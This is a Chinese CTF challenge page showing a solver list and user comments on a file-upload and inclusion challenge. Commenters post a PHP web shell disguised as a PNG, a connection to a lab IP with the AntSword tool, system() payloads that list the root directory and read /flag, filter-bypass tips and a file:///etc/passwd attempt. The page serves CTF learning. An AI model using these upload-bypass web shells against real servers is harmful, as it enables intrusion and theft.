评分(5)
解题动态

1234567nxb 攻破了该题 4小时前

lin666 攻破了该题 8小时前

jhon 攻破了该题 1天前

2021060287 攻破了该题 1天前

椰子 攻破了该题 1天前

暗A166668 攻破了该题 2天前

alizee 攻破了该题 2天前

cl20354 攻破了该题 2天前

姥姥 攻破了该题 2天前

白六真的6 攻破了该题 3天前

ysecer8 攻破了该题 3天前

qwepio 攻破了该题 3天前

baotou91 攻破了该题 3天前

jkljkl 攻破了该题 4天前

jiafeimao 攻破了该题 4天前

你文博哥哥 攻破了该题 4天前

VVang 攻破了该题 4天前

qianye 攻破了该题 4天前

凌晨3点的阳光 攻破了该题 4天前

评论
青蛙骑士 3年前
举报
别卷了阿财
liln0te 3年前
举报
看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以
lysr 3年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
lysr 3年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
109张某 1年前
举报
大佬,中国蚁剑怎么连上的哦,他从服务器端直接过滤了php,直接就把最基本的连接类型阻断了,抓包也不能修改php类型
admin138798 3年前
举报
将<script language=php>system("cat /flag")</script>写成jpg文件上传直接访问就有flag了
狐萝卜CarroT 3年前
举报
什么意思,直接改成/flag就出来了
zxmals 3年前
举报
我这运气 file:///etc/passwd
wINFerno 3年前
举报
这题目我使用蚁剑连接不上,就写了<script language="php" >system('ls -al /')</script>查看目录 <script language="php" >system('tac /flag')</script>找到flag
zhou0626 3年前
举报
用蚁剑看了眼发现flag文件被放到了根目录
andrewlong 3年前
举报
/flag ??????
守得云开见月明 3年前
举报
@思南you flag是直接存放在根目录下的
思南you 3年前
举报
这是什么原理大佬